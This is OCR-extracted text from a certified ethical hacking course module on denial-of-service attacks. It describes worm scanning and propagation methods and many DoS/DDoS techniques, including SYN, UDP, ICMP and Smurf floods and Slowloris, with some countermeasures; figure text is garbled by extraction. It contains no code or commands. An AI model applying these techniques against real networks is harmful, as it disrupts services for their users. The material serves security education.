Topological Scanning This technique uses the information obtained from an infected machine to find new vulnerable machines. An infected host checks for URLs in the hard drive of a machine that it wants to infect. Subsequently, it shortlists URLs and targets, and it checks their vulnerability. This technique yields accurate results, and its performance is similar to that of the hit-list scanning technique. Local Subnet Scanning In this technique, an infected machine searches for new vulnerable machines in its local network, behind a firewall, by using the information hidden in the local addresses. Attackers use this technique in combination with other scanning mechanisms. Permutation Scanning

In this technique, attackers share a common pseudorandom permutation list of IP addresses of all machines. The list is created using a block cipher of 32 bits and a preselected key. If a compromised host is infected during either hit-list scanning or local subnet scanning, the list is scanned from immediately after the point of the compromised host to identify new targets. If a compromised host is infected during permutation scanning, scanning restarts from a random point. If an already infected machine is encountered, scanning restarts from a new random start point in the permutation list. The process of scanning stops when the compromised host consecutively encounters a predefined number of already infected machines and fails to find new targets. Thereafter, a new permutation key is generated to initiate a new scanning phase. Permutation scanning has the following advantages: o

The reinfection of a target is avoided.

o

New targets are scanned at random, thereby ensuring a high scanning speed.

Module 10 Page 1430

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

How Does Malicious Code Propagate?

(q E H

Attackers use three techniques to propagate malicious code to newly discovered vulnerable systems Attackers placean attack toolkiton the central source, anda copy of the attack toolkitis transferred to the newly discovered vulnerable system

Central Source Propagation /

Next Victim

Copy Code i

*roveoations

Next Victim The attacking host itself transfers the

attack toolkitto the newly discovered

Autonomous

vulnerable system at the exact time

the attack toolkitis transferred to

the newly discovered vulnerable system

NU sap

Propagation

that it breaks into that system

An attacker placesan attack toolkit on his/her own system, anda copyof

Code

ne oe

_

How Does Malicious Code Propagate? Discussed below are three techniques build attack networks: =

used by an attacker to propagate

malicious code and

Central Source Propagation

In this technique, the attacker places an attack toolkit on a central source and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. Once the attacker finds a vulnerable machine, they instruct the central source to transfer a copy of the attack toolkit to the newly compromised machine, on which attack tools are automatically installed under management by a scripting mechanism. This initiates a new attack cycle, in which the newly infected machine searches for other vulnerable machines and repeats the process to install the attack toolkit. In general, this technique uses HTTP, FTP, and RPC protocols.

Central Source

Qt,

Attacker

ml

B=

Qos.

Victim

v7

=

Next Victim

Figure 10.7: Central source propagation

Module 10 Page 1431

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

=

Exam 312-50 Certified Ethical Hacker

Back-chaining Propagation In this technique, the attacker places an attack toolkit on their own system, and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. The attack tools installed on the attacking machine use some special methods to accept a connection from the compromised system and then transfer a file containing the attack tools to it. Simple port listeners containing a copy of this file or full intruder-installed web servers, both of which use the Trivial File Transfer Protocol (TFTP), support this back-channel file copy. Copy Code

Repeat

seeeeeeeeeees>

Attacker

@:.

errr

Victim



ao

Next Victim

Figure 10.8: Back-chaining propagation

=

Autonomous Propagation Unlike the previously discussed mechanisms, in which an external file source transfers the attack toolkit, in autonomous propagation, the attacking host itself transfers the attack toolkit to a newly discovered vulnerable system, exactly at the time it breaks into that system. Exploit and Code

Attacker

>

Victim

Next Victim

Figure 10.9: Autonomous Propagation

Module 10 Page 1432

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

CEH

LO#03: Demonstrate Different DoS/DDoS Attack Techniques

DoS/DDoS Attack Techniques Attackers implement various techniques to launch denial-of-service (DoS)/distributed denial-ofservice (DDoS) attacks on target computers or networks. This section discusses the basic categories of DoS/DDoS attack vectors, various attack techniques, and various DoS/DDoS attack tools used to take over a single or multiple network system to exhaust their computing resources or render them unavailable to their intended users.

Module 10 Page 1433

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Hacking and Countermeasures

Ethical

Exam 312-50 Certified Ethical Hacker

Denial-of-Service

Basic Categories of DoS/DDoS Attack Vectors Volumetric Attacks ‘@

Consume the bandwidth of a target network or service

@ The magnitude of attack is measured in bits-per-second (bps) |@ Types of bandwidth depletion attacks: @ Flood attacks © Amplification attacks Attack Techniques © UDP flood attack © ICMPflood attack © Ping of Death and Smurf attack © Pulse wave and zero-day attack

Protocol Attacks

@ Consume other types of resources

like connection state tables present in network infrastructure

components such as load-balancers, firewalls, and application servers The magnitude of attackis measured in packets-per-second (pps)

Attack Techniques © SYN flood attack © Fragmentationattack © Spoofed session flood attack © ACK flood attack © TCPSACK panic attack

CE H

Application Layer Attacks @ Consume the resourcesor services of an application,

thereby making the application unavailableto other legitimate users @ The magnitude of attackis measured in requests-persecond (rps)

Attack Techniques © HTTPGET/POSTattack © Slowloris attack © UDP application layer flood attack © DDoS extortion attack

Basic Categories of DoS/DDoS Attack Vectors DDoS attacks mainly aim to diminish the network bandwidth by exhausting network, application, or service resources, thereby restricting legitimate users from accessing system or network resources. In general, DoS/DDoS attack vectors are categorized as follows:

=

Volumetric Attacks These attacks exhaust the bandwidth either within the target network/service or between the target network/service and the rest of the Internet to cause traffic blockage, preventing access to legitimate users. The attack magnitude is measured in bits per second (bps). Volumetric DDoS attacks generally target protocols such as the Network Time Protocol (NTP), Domain Name System (DNS), and Simple Service Discovery Protocol (SSDP), which are stateless and do not have built-in congestion avoidance features. The generation of a large number of packets can cause the consumption of the entire bandwidth on the network. A single machine cannot make enough requests to overwhelm network equipment. Hence, in DDoS attacks, the attacker uses several computers to flood a victim. In this case, the attacker can control all the machines and instruct them to direct traffic to the target system. DDoS attacks flood a network, causing a significant statistical change in network traffic that overwhelms network equipment such as switches and routers. Attackers use the processing power of a large number of geographically distributed machines to generate huge traffic directed at the victim, which is why such an attack is called a DDoS attack.

Module 10 Page 1434

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

There are two types of bandwidth depletion attacks: o

Ina flood attack, zombies send large volumes of traffic to the victim’s systems to exhaust the bandwidth of these systems.

o

Inanamplification attack, the attacker or zombies transfer messages to a broadcast IP address. This method amplifies malicious traffic that consumes the bandwidth of the victim’s systems.

Attackers use botnets and perform DDoS attacks by flooding the network. The entire bandwidth is used up by attackers, and no bandwidth remains for legitimate use. The following are examples for volumetric attack techniques:

=

o

User Datagram Protocol (UDP) flood attack

o

Internet Control Message Protocol (ICMP) flood attack

o

Ping of Death (PoD) attack

o

Smurf attack

o

Pulse wave attack

o

Zero-day attack

o

Malformed IP packet flood attack

©

Spoofed IP packet flood attack

Protocol Attacks Attackers can also prevent access to a target by consuming types of resources other than bandwidth, such as connection state tables. Protocol DDoS attacks exhaust resources available on the target or on a specific device between the target and the Internet. These attacks consume the connection state tables present in network infrastructure devices such as load balancers, firewalls, and application servers. Consequently, no new connections will be allowed, because the device will be waiting for existing connections to close or expire. In this case, the attack magnitude is measured in packets per second (pps) or connections per second (cps). These attacks can even take over the state of millions of connections maintained by high-capacity devices. The following are examples for protocol attack techniques: o

Synchronize (SYN) flood attack

o

ACK and PUSH ACK flood attack

o

Fragmentation attack

o

TCP connection flood attack

©

Spoofed session flood attack

o

TCP state exhaustion attack

o

Acknowledgement (ACK) flood attack

o

RST attack

o

TCP SACK panic attack

o

SYN-ACK flood attack

Module 10 Page 1435

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Application Layer Attacks In these attacks, the attacker attempts to exploit vulnerabilities in the application layer protocol or in the application itself to prevent legitimate users from accessing the application. Attacks on unpatched, vulnerable systems do not require as much bandwidth as protocol or volumetric DDoS attacks for succeeding. In application DDoS attacks, the application layer or application resources are consumed by opening connections and leaving them open until no new connections can be made. These attacks destroy a specific aspect of an application or service and can be effective with one or a few attacking machines that produce a low traffic rate. Furthermore, these attacks are very difficult to detect and mitigate. The magnitude of attack is measured in requests per second (rps). Application-level flood attacks result in the loss of services of a particular network, such as emails and network resources, or the temporary shutdown of applications and services. Through this attack, attackers exploit weaknesses in programming source code to prevent the application from processing legitimate requests. Several kinds of DoS attacks rely on software-related exploits such as buffer overflows. A buffer overflow attack sends excessive data to an application that either shuts down the application or forces the data sent to the application to run on the host system. The attack crashes a vulnerable system remotely by sending excessive traffic to an application. Occasionally, attackers can also execute arbitrary code on the remote system via a buffer overflow. Sending too much data to an application overwrites the data that controls the program, enabling the hacker to run their code instead. Using application-level flood attacks, attackers attempt to do the following: o

Flood web applications with legitimate user traffic

o

Disrupt service to a specific system or person access through repeated invalid login attempts

o

Jam the application database Language (SQL) queries

connection

by, for example,

blocking a user’s

by crafting malicious Structured

Query

Application-level flood attacks can result in a substantial loss of money, service, and reputation for organizations. These attacks occur after the establishment of a connection. Because a connection is established and the traffic entering the target appears to be legitimate, it is difficult to detect these attacks. However, if the user identifies the attack, they can stop it and trace it back to its source more easily than other types of DDoS attacks. The following are examples for application layer attack techniques: o

Hypertext Transfer Protocol (HTTP) flood attack

o

Slowloris attack

Module 10 Page 1436

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service o

UDP application layer flood attack

o

DDoS extortion attack

Exam 312-50 Certified Ethical Hacker

DoS/DDoS Attack Techniques Next, the following DoS/DDoS attack techniques will be discussed: UDP flood attack

HTTPS GET/POST attack

ICMP flood attack

Slowloris attack

PoD attack

UDP application layer flood attack

Smurf attack

=

Multi-vector attack

Pulse wave attack

=

Peer-to-peer attack

Zero-day attack

=

Permanent DoS (PDoS) attack

SYN flood attack

Distributed reflection DoS (DRDoS) attack

Fragmentation attack ACK flood attack TCP state exhaustion attack

TCP SACK panic attack DDoS extortion attack

Spoofed session flood attack

Module 10 Page 1437

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

UDP Flood Attack

CE H

@ Anattacker sends spoofed UDP packets at a very high

A>...

packet rate to a remote host on random ports of a

i a large source IP range target server using

sends sess or poe‘he attacker er sere and random destination UDP ports

|

TaptSener -

|@ The flooding of UDP packets causes the server to repeatedly check for non-existent applications at the ports

upp Packet ‘@

Legitimate applications are inaccessible by the system

UDP Packet

and give an error reply with an ICMP “Destination Unreachable” packet

ICMP error

Paced

@ This attack consumes network resources and available

bandwidth, exhaustingthe network until it goes offline

v

unreachable

vo

UDP Flood Attack In a UDP flood attack, an attacker sends spoofed UDP packets at a very high packet rate to a remote host on random ports of a target server by using a large source IP range. The flooding of UDP packets causes the server to check repeatedly for nonexistent applications at the ports. Consequently, legitimate applications become inaccessible by the system, and any attempts to access them return an error reply with an ICMP “Destination Unreachable” packet. This attack consumes network resources and available bandwidth, exhausting the network until it goes offline.

The attacker sends

{|

UDP packets with spoofed IP address and random destination UDP ports

fa

Target Server

UDP Packet UDP Packet

UDP Packet

ICMP error packets of destination unreachable Figure 10.10: UDP flood attack

Module 10 Page 1438

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

ICMP Flood Attack

CE H

@

|@ Network administrators use ICMP primarily for IP operations and troubleshooting, and error messaging is used for undeliverable packets

‘The attacker sends ICMP ECHO requests with spoofed source addresses

Target Server

@ ICMP flood attacks are a type of attackin which attackers send

large volumes of ICMP echo request packets toa victim system

directly or through reflection networks

|@ These packets signal the victim's system to reply, and the resulting combination of traffic saturates the bandwidth of the victim's network connection, causing it to be overwhelmed and

4 -Maximum limit of ICMP ECHO requests per second- | ECHO Request

subsequently stop responding to legitimate TCP/IP requests

@ To protect against ICMP flood attacks, set a threshold limit that invokes an ICMP flood attack protection feature when

exceeded

~~

Legitimate ICMP ECHO request from

‘an address in the same security zone

ICMP Flood Attack Network administrators use ICMP primarily for IP operations, troubleshooting, and error messaging for undeliverable packets. In this attack, attackers send large volumes of ICMP echo request packets to a victim’s system directly or through reflection networks. These packets signal the victim’s system to reply, and the large traffic saturates the bandwidth of the victim’s network connection, causing it to be overwhelmed and subsequently stop responding to legitimate TCP/IP requests. To protect against ICMP flood attacks, it is necessary to set a threshold that invokes the ICMP flood attack protection feature when exceeded. When the ICMP threshold is exceeded (by default, the threshold value is 1000 packets/s), the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second as well as

the next second.

Module 10 Page 1439

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

The attacker sends ICMP ECHO

Target Server

requests with spoofed source addresses

ECHO Request ECHO Repl ECHO Request ECHO Reply

-Maximum limit of ICMP ECHO requests per secondECHO Ri

ECHO

t

Request

Legitimate ICMP ECHO request from

an address in the same security zone Figure 10.11: ICMP flood attack

Module 10 Page 1440

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Ping of Death and Smurf Attacks

CE H

Ping of Death Attack

Smurf Attack

@ Ina Ping of Death (PoD) attack, an attacker tries to crash, destabilize, or freeze the targeted system or service by sending malformed or oversized packets usinga simple ping command @ For instance,the attacker sends a packet which hasa size of 65,538 bytes to the target web server. This packet size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process of the receiving

@ Ina Smurf attack, the attacker spoofs the source IP address with the victim's IP address and sends a large number of ICMP ECHO request packets to an IP broadcastnetwork @ This causes all the hosts on the broadcastnetworkto respondto the received ICMP ECHO requests. These responses will be sent to the victim machine, ultimately causing the machineto crash

system might cause the system to crash

Target Server

Ping of Death Attack In a Ping of Death (PoD) attack, an attacker attempts to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets using a simple ping command. Suppose an attacker sends a packet with a size of 65,538 bytes to the target web server. This size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process performed by the receiving system might cause the system to crash. In such attacks, the attacker’s identity can be easily spoofed, and the attacker might not need detailed knowledge of the target machine, except its IP address. 20 Bytes

8 Bytes

IP HEADER

ICMP. HEADER

PPP

ert

65,510 Bytes (anPDE ves

Attacker

> ———]

®

Target Server Figure 10.12: Ping-of-death attack

Smurf Attack In a Smurf attack, the attacker spoofs the source IP address with the victim’s IP address and sends a large number of ICMP ECHO request packets to an IP broadcast network. This causes all the hosts on the broadcast network to respond to the received ICMP ECHO requests. These responses are sent to the victim’s machine because the IP address was spoofed by the attacker, causing significant traffic to the victim’s machine and ultimately making it crash.

Module 10 Page 1441

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

IP Broadcast Network Figure 10.13: Smurf attack

Module 10 Page 1442

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Pulse Wave and Zero-Day DDoS Attacks Pulse Wave DDoS Attack

Zero-Day DDoS Attack

@ Ina pulse wave DDoS attack, attackers send a highly repetitive,

@

10 minutes, and each specific attack session can last for a few hoursto days @ A single pulse (300 Gbps or more) is sufficientto crowd a

@

periodic train of packets as pulses to the target victim every

Bandwidth —>

network pipe

@

400 Gts|

|

Azero-day DDoS attack is delivered before the DDoS vulnerabilities of a system have been patched or effective defensive mechanisms are implemented Until the victim deploys a patch for the exploited DDoS vulnerability, an attacker can actively block all the victim's resources and steal the victim’s data These attacks can cause severe damage to the victim’s network infrastructure and assets

300 Gb 200 Gb 100 Gbes 10:00

obps!

Pulse Wave DDoS Attack

Bandwidth ——»>

Pulse wave DDoS attacks are the latest type of DDoS attacks employed by threat actors to disrupt the standard operations of targets. Generally, DDoS attack patterns are continuous incoming traffic flows. However, in pulse wave DDoS attacks, the attack pattern is periodic, and the attack is huge, consuming the entire bandwidth of target networks. Attackers send a highly repetitive strain of packets as pulses to the target victim every 10 min, and the attack session lasts for approximately an hour or some days. A single pulse (300 Gbps or more) is more than enough to crowd a network pipe. Recovery from such attacks is very difficult and occasionally impossible.

400 Gbps 300 Gbps| 200 Gbps| 100 Gbps

10:00

O Gbps.

Figure 10.14: Pulse wave DDoS attack

Module 10 Page 1443

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Zero-Day DDoS Attack Zero-day DDoS attacks are attacks in which DDoS vulnerabilities do not have patches or effective defensive mechanisms. Until the victim identifies the threat actor’s attack strategy and deploys a patch for the exploited DDoS vulnerability, the attacker actively blocks all the victim’s resources and steals the victim’s data. These attacks can cause severe damage to the victim’s network infrastructure and assets. Currently, there is no versatile approach to protect networks from this type of attack.

Module 10 Page 1444

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

SYN Flood Attack

CE H

@ The attacker sends a large number of SYN requests with fake source IP addresses to the target server (victim)

‘@ The target machine sends back a SYN/ACKin response to the request

and waits for the ACK to complete the session setup

@ The target machine does not get the response because the source address is fake |@ SYN flooding takes advantage of a flaw in the implementation of the TCP three-way handshake in most hosts |@ When Host B receives the SYN request from Host A, it must keep track of the partially opened connection in a "listen queue" for at least 75 seconds @ Amalicious host can exploit the small size of the listen queue by sending multiple SYN requests to a host, but never replying to the

1

os

Normal connection

stablshment

|

SYN/ACK

@ The victim's listen queue is quickly filled up @ The ability to delay each incomplete connection for 75 seconds can be used cumulatively as a Denial-of-Service attack

SYN Flood Attack In a SYN attack, the attacker sends a large number of SYN requests to the target server (victim) with fake source IP addresses. The attack creates incomplete TCP connections that use up network resources. Normally, when a client wants to begin a TCP connection to a server, the client and server exchange the following series of messages: =

ATCP SYN request packet is sent to a server.

=

The server sends a SYN/ACK (acknowledgement) in response to the request.

=

The client sends a response ACK to the server to complete the session setup.

This method is a “three-way handshake.” In a SYN attack, the attacker exploits the three-way handshake method. First, the attacker sends a fake TCP SYN request to the target server. After the server sends a SYN/ACK in response to the client’s (attacker’s) request, the client never sends an ACK response. This leaves the server waiting to complete the connection. SYN flooding takes advantage of the flawed manner in which most hosts implement the TCP three-way handshake. This attack occurs when the attacker sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, a connection is established with the TCP three-way handshake. The host keeps track of partially open connections while waiting for response ACK packets in a listening queue. As shown in the figure, when Host B receives a SYN request from Host A, it must keep track of the partially opened connection in a “listen queue” for at least 75 s.

Module 10 Page 1445

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Denial-of-Service

ca ae

Host A

Host B

Normal connection establishment

Figure 10.15: SYN flood attack

A malicious host can exploit another host, managing many partial connections by sending many SYN requests to the target host simultaneously. When the queue is full, the system cannot open new connections until it drops some entries from the connection queue through handshake timeouts. This ability to hold up each incomplete connection for 75 s can be cumulatively exploited in a DoS attack. The attack uses fake IP addresses, making it difficult to trace the source. An attacker can fill a table of connections even without spoofing the source IP address. In addition to SYN flood attacks, attackers can also employ SYN-ACK and ACK/PUSH ACK flood attacks to disrupt target machines. All these attacks are similar in functionality with minor variations.

SYN-ACK Flood Attack This type of attack is similar to the SYN flood attack, except that in this type of flood attack, the attacker exploits the second stage of a three-way handshake by sending a large number of SYNACK packets to the target machine to exhaust its resources. ACK and PUSH ACK Flood Attack During an active TCP session, ACK and PUSH ACK are the flags used to transfer information to and from the server and client machines till the session ends. In an ACK and PUSH ACK flood attack, attackers send a large amount of spoofed ACK and PUSH ACK packets to the target machine, making it non-functional.

Module 10 Page 1446

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Countermeasures for SYN Flood Attacks Proper packet filtering is a viable solution to SYN flood attacks. An administrator can also tune the TCP/IP stack to reduce the impact of SYN attacks while allowing legitimate client traffic. Some SYN attacks do not attempt to upset servers; instead, they attempt to consume the entire bandwidth of the Internet connection. Two tools to counter this attack are SYN cookies and SynAttackProtect. To guard against an attacker attempting to consume the bandwidth of an Internet connection, an administrator can implement some additional safety measures; for example, they can decrease the time-out period in which a pending connection is maintained in the “SYN RECEIVED” state in the queue. Normally, if a client sends no response ACK, a server will retransmit the first ACK packet. This vulnerability can be removed by decreasing the time of the first packet’s retransmission, decreasing the number of packet retransmissions, or turning off packet retransmissions entirely.

Module 10 Page 1447

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Denial-of-Service

Fragmentation Attack

CE H

|@ These attacks stop a victim from being able to re-assemble fragmented packets by flooding the target system with TCP or UDP fragments, resulting in reduced performance. Attackers send a large number of fragmented (1500+ byte) packets to a target web server with a relatively small packet rate |@ Because the protocol allows for fragmentation, these packets usually pass uninspected through network equipment such as routers, firewalls, and IDS/IPS |@ Reassemblingand inspecting these large fragmented packets consumes excessive resources. Moreover, the contentin the packet fragments will be randomized by the attacker, which in turn makes the process consume more resources, causing the system to crash

——————

—— Fragment2 —>





Figure 10.16: Fragmentation attack

Module 10 Page 1448

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Spoofed Session Flood Attack

C E H

@ Attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets



.

@ Attackers employ this attack to bypass firewalls and perform DDoS attacks against the target network, exhausting its network resources

@ Attackers create a fake session with multiple SYN and multiple ACK packets along with one or more RST or FIN packets

Multiple ACK Spoofed Session Flood Attack

FAH

Multiple SYN-ACK Spoofed Session Flood Attack

|@ Attackers create a fake session by completely skipping the SYN packets and using only multiple ACK packets along with one or more RST or FIN packets

Copyright © by

Spoofed Session Flood Attack In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets. Attackers employ this attack to bypass firewalls and perform DDoS attacks against target networks, exhausting their network resources. The following are examples for spoofed session flood attacks:

=

Multiple SYN-ACK Spoofed Session Flood Attack In this type of flood attack, attackers create a fake session with multiple ACK packets, along with one or more RST or FIN packets.

=

multiple

SYN

and

Multiple ACK Spoofed Session Flood Attack In this type of flood attack, attackers create a fake session by completely skipping SYN packets and using only multiple ACK packets along with one or more RST or FIN packets.

Because SYN packets are not employed and firewalls mostly use SYN packet filters to detect abnormal

traffic, the DDoS

detection

rate of the firewalls is very low for these

types of attacks.

Module 10 Page 1449

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

HTTP GET/POST HTTP @

GET/POST

and Slowloris Attacks Attack

Slowloris Attack

HTTP clients such as web browsers connect to a web server

@

through the HTTP protocol to send HTTP requests. These requests can be either HTTP GET or HTTP POST @ InanHTTP GET attack, attackers use a time-delayed HTTP header to maintain HTTP connections and exhaust web server resources @

InanHTTP

to the target web server or application

multiple open connections and keeps waiting for the requests to complete @ These requests will not be complete,and as a result, the target server's maximum concurrent connection pool will be exhausted, and additional connection attempts will be denied

complete headers but with incomplete message bodies to the target web server or application, prompting the server to wait for the rest of the message body |

|] |]

Normal HTTP request-response connection

]

with time-delayed “ BK Target server waiting for complete header

HTTP POST Attack ]

In the Slowloris attack, the attacker sends partial HTTP requests

‘@ Upon receiving the partial HTTP requests, the target server opens

POST attack, attackers send HTTP requests with

HTTP GET Attack

CE H

Target server waitingfor message body

] ]

|]

Slowloris DDoS attack

response

|

HTTP GET/POST Attack HTTP attacks are layer-7 attacks. HTTP clients, such as web browsers, connect to a web server through HTTP to send HTTP requests, which can be either HTTP GET or HTTP POST. Attackers exploit these requests to perform DoS attacks. In an HTTP GET attack, the attacker uses a time-delayed HTTP header to hold on to an HTTP connection and exhaust web-server resources. The attacker never sends the full request to the target server. Consequently, the server retains the HTTP connection and waits, making it inaccessible for legitimate users. In these types of attacks, all the network parameters appear healthy while the service remains unavailable. In an HTTP POST attack, the attacker sends HTTP requests with complete headers but an incomplete message body to the target web server or application. Because the message body is incomplete, the server waits for the rest of the body, making the web server or web application unavailable to legitimate users. An HTTP GET/POST attack is a sophisticated layer-7 attack that does not use malformed packets, spoofing, or reflection techniques. This type of attack requires less bandwidth than other attacks to bring down the targeted site or web server. This attack aims to compel the server to allocate as many resources as possible to serve the attack, thereby denying legitimate

users access to the server’s resources.

Module 10 Page 1450

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

HTTP GET Attack Request with time-delayed HTTP header

Target server waiting for complete header

Attacker

HTTP POST Attack Request with incomplete message body

Target server waiting for message body

Attacker

Figure 10.17: HTTP GET/POST attack

In addition to the aforementioned HTTP GET/POST attack, attackers can employ the following HTTP flood attacks to exhaust the target network’s bandwidth: =

Single-Session HTTP Flood Attack In this type of flood attack, an attacker exploits the vulnerabilities bombard a target with multiple requests in a single HTTP session.

=

in HTTP

1.1 to

Single-Request HTTP Flood Attack In this type of flood attack, attackers make several HTTP requests from a single HTTP session by masking these requests within one HTTP packet. This technique allows attackers to be anonymous and invisible while performing DDoS attacks.

=

Recursive HTTP GET Flood Attack Staying undetected is key for attackers. An attacker posing as a legitimate user and performing legitimate actions can trick any firewall into believing that the source is legitimate while it is not. Recursive GET collects a list of pages or images and appears to be going through these pages or images. However, it stealthily performs flooding attacks on the target. The recursive GET in combination with an HTTP flood attack can cause extreme damage to the target.

=

Random Recursive GET Flood Attack This type of attack is a tweaked version of the recursive GET flood attack. It is designed for forums, blogs, and other websites that have pages in a sequence. Similar to the recursive GET flood attack, in this attack, the recursive GET pretends to be going through pages. Because the targets are forums, groups, and other blogs, the attacker uses random numbers from a valid page range to pose as a legitimate user and sends a new GET request each time. In both recursive GET and random recursive GET flood attacks, the target is bombarded with a large number of GET requests, exhausting its

resources.

Module 10 Page 1451

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Slowloris Attack Slowloris is a DDoS attack tool used to perform layer-7 DDoS attacks to take down web infrastructure. It is distinctly different from other tools in that it uses perfectly legitimate HTTP traffic to take down a target server. In Slowloris attacks, the attacker sends partial HTTP requests to the target web server or application. Upon receiving the partial requests, the target server opens multiple connections and waits for the requests to complete. However, these requests remain incomplete, causing the target server’s maximum concurrent connection pool to be filled up and additional connection attempts to be denied. Normal HTTP request-response connection

AA:

HTTP request

HTTP response

Slowloris DDoS attack HTTP

t

Figure 10.18: Slowloris attack

Module 10 Page 1452

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

UDP Application Layer Flood Attack

CE H

|@ Some of the UDP-based application layer protocols that attackers can employ for flooding the target networks include:

NTP

|

Quake Network Protocol Steam Protocol

|

VoIP

|

Copyright © by

UDP Application Layer Flood Attack Though UDP flood attacks are known for their volumetric attack nature, some application layer protocols that rely on UDP can be employed by attackers to perform flood attacks on target networks. The following are examples for UDP-based employ for flooding target networks:

application

layer

protocols

that

attackers

can

=

Character Generator Protocol

=

Trivial File Transfer Protocol (TFTP)

=

=

(CHARGEN) Simple Network Management Protocol Version 2 (SNMPv2)

Network Basic Input/Output System (NetBIOS)

=

NTP

=

Quake Network Protocol

=

Steam Protocol

=

Voice over Internet Protocol (VoIP)

=

Quote of the Day (QOTD)

=

Remote procedure call (RPC)

=

SSDP

=

Connection-less Lightweight Directory Access Protocol (CLDAP)

Module 10 Page 1453

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Multi-Vector Attack

CE H

@ In multi-vector DDoS attacks, the attackers use combinations of volumetric, protocol, and application-layer attacks to disable the target system or service

|@ Attackers rapidly and repeatedly change the form of their DDoS attack (e.g., SYN packets, Layer 7) |@ These attacks are either launched one vector at a time or in parallel to confuse a company’s IT department and exhaust their resources with their focus diverted to the wrong solution Volumetric

Multi-Vector attack

Protocol

in sequence

Attacker

Multi-Vector attack in parallel

Multi-Vector Attack In multi-vector DDoS attacks, the attacker uses combinations of volumetric, protocol, and application layer attacks to take down the target system or service. The attacker quickly changes from one form of DDoS attack (e.g., SYN packets) to another (layer 7). These attacks are either launched through one vector at a time or through multiple vectors in parallel to confuse a company’s IT department, making them spend all their resources and maliciously diverting their focus. Volumetric

Attack

Multi-Vector attack

oe

in sequence

Protocol

Attack

aoe

Application

Attacker

Victim Volumetric Attack susecesesscensssensssesesssses>

Multi-Vector attack

Protocol Attack

in parallel

Attacker

